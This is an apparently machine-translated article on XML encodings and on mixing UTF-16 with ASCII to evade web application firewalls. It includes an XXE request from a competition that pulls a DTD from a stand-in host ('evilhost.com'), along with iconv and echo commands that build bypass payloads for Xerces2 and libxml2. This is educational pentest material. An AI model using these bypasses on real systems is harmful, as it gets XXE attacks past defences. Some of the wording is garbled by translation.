📜 ⬆️ ⬇️

Evil XML with two encodings

WAFs see white noise instead of a document!
000000003C3F 786D 6C20 7665 7273 696F 6E3D 2231<? xml version = "1
000000102E30 2220 656E 636F 6469 6E67 3D22 5554.0 "encoding =" UT
00000020462D 3136 4245 2200 3F00 3E00 3C00 6100F-16BE ".?.>. <. A.
000000303E00 3100 3300 3300 3700 3C00 2F00 6100> .1.3.3.7. <./. A.
000000403E>
The article contains a short story about encoding in XML and about bypassing WAFs with their help.

What encodings work in XML


The specification requires parsers to understand two encodings: UTF-8 and UTF-16. Parsers support more, but these will be enough to attack.

UTF-8 and UTF-16 display the same characters from the Unicode table .

The difference between encodings is how they store the character number.
')
UTF-8
One character - from one to four bytes.

The character code is stored in a pattern:
Number of bytesSignificant bitsBinary code
one70xxxxxxx
2eleven110xxxxx 10xxxxxx
3sixteen1110xxxx 10xxxxxx 10xxxxxx
four2111110xxx 10xxxxxx 10xxxxxx 10xxxxxx
It is impossible to encode characters. The shortest way is correct.

UTF-16
One character - two or four bytes.

The character code is stored in a pattern:
Number of bytesSignificant bitsBinary code
2sixteenxxxxxxxx xxxxxxxx
four *20110110xx xxxxxxxx 110111xx xxxxxxxx
* 0x010000 is deducted from the code

Writing a character with 4 bytes is called a surrogate pair . The pair consists of two common characters, but from the reserved range: from U + D800 to U + DFFF. The halves of the pair are not valid by themselves.

UTF-16 is of two kinds: UTF-16BE and UTF-16LE (big-endian / little-endian). They have a different byte order.

Big-endian is a “natural” byte order, as in Arabic numerals.
Little-endian - reverse order bytes.

Examples of writing characters in UTF-16BE and UTF-16LE
EncodingSymbolBinary code
UTF-16BEU + 003F00000000 00111111
UTF-16LEU + 003F00111111 00000000
UTF-16BE *U + 1D6E5110110 00 00110101 110111 10 1100101
UTF-16LE *U + 1D6E500110101 110110 00 11100101 110111 10
* In four-byte characters, groups of 2 bytes are flipped separately. This is done for backward compatibility with Unicode 1.0, where all characters consisted of only two bytes.

How parsers define encoding


Parsers define encoding in four ways:

External encoding information
Some network protocols have a special field for encoding:


WebDav Encoding Transmission

Most often, these are protocols that are built according to the MIME standard: for example, SMTP, HTTP, and WebDAV.

Byte Order Mark (BOM)

BOM - a symbol with the code U + FEFF.

If the parser finds it at the beginning, it will determine the encoding according to how it is written.

Popular encodings and their BOM
EncodingBomExample
UTF-8EF BB BFEF BB BF 3C 3F 78 6D 6C... <? xml
UTF-16BEFE FFFE FF 00 3C 00 3F 00 78 00 6D 00 6C... <.?. xml
UTF-16LEFF FEFF FE 3C 00 3F 00 78 00 6D 00 6C 00.. <.?. xml
BOM works only at the beginning of the document. In the middle, it is read as a special space or causes an error.

By the first characters of the document

The specification allows the parser to look at the first four bytes and determine the encoding for them:
EncodingDocument start
UTF-8
ISO 646
ASCII
3C 3F 78 6D<? xm
UTF-16BE00 3C 00 3F. <.?
UTF-16LE3C 00 3F 00<.?
This only works for documents that start with an XML declaration.

From the XML declaration

The encoding can be specified in the XML declaration:

<?xml version="1.0" encoding="UTF-8"?> 

An XML declaration is a string that is written at the very beginning. According to it, the parser understands the format of the document.

 <?xml version="1.0" encoding="ISO-8859-1" ?> <très>là </très> 
The document is encoded ISO-8859-1

To read the declaration, the parser, apparently, should already know the encoding. But the declaration is useful for clarifying between similar encodings: for example, compatible with ASCII.

Standard WAF bypass


The easiest option is to change the encoding to incompatible with ASCII and hope that WAF will not understand it.

This method worked on the WAF Bypass competition in 2015. There, participants were required to read the flag through the XXE vulnerability:

Request for XXE operation from the competition
 POST / HTTP/1.1 Host: d3rr0r1m.waf-bypass.phdays.com Connection: close Content-Type: text/xml User-Agent: Mozilla/5.0 Content-Length: 166 <?xml version="1.0"?> <!DOCTYPE root [ <!ENTITY % xxe SYSTEM "http://evilhost.com/waf.dtd"> %xxe; ]> <root> <method>test</method> </root> 

One solution is to transcode the request body into UTF-16BE without a BOM:

 cat original.xml | iconv -f UTF-8 -t UTF-16BE > payload.xml 

In this document, WAF saw no danger and missed the request.

Bypass using two encodings

Another way to confuse WAF is to encode XML in two encodings at once.

When the parser reads the encoding from the declaration, it immediately switches to it. Even if it is incompatible with the encoding in which the declaration itself is recorded.

If you create a document and declaration in different encodings, then WAFs will not understand anything.

Xerces2 java parser

The declaration is in ASCII, then UTF-16BE:
000000003C3F 786D 6C20 7665 7273 696F 6E3D 2231<? xml version = "1
000000102E30 2220 656E 636F 6469 6E67 3D22 5554.0 "encoding =" UT
00000020462D 3136 4245 223F 3E00 3C00 6100 3E00F-16BE "?>. <. A.>.
000000303100 3300 3300 3700 3C00 2F00 6100 3E1.3.3.7. <./. A.>
Teams to form:

 echo -n '<?xml version="1.0" encoding="UTF-16BE"?>' > payload.xml echo '<a>1337</a>' | iconv -f UTF-8 -t UTF-16BE >> payload.xml 

libxml2

libxml2 switches the encoding as soon as the attribute reads. Therefore, we change the encoding before closing the declaration:
000000003C3F 786D 6C20 7665 7273 696F 6E3D 2231<? xml version = "1
000000102E30 2220 656E 636F 6469 6E67 3D22 5554.0 "encoding =" UT
00000020462D 3136 4245 2200 3F00 3E00 3C00 6100F-16BE ".?.>. <. A.
000000303E00 3100 3300 3300 3700 3C00 2F00 6100> .1.3.3.7. <./. A.
000000403E>
Teams to form:

 echo -n '<?xml version="1.0" encoding="UTF-16BE"' > payload.xml echo '?><a>1337</a>' | iconv -f UTF-8 -t UTF-16BE >> payload.xml 

Successful pentest!

Source: https://habr.com/ru/post/340000/


All Articles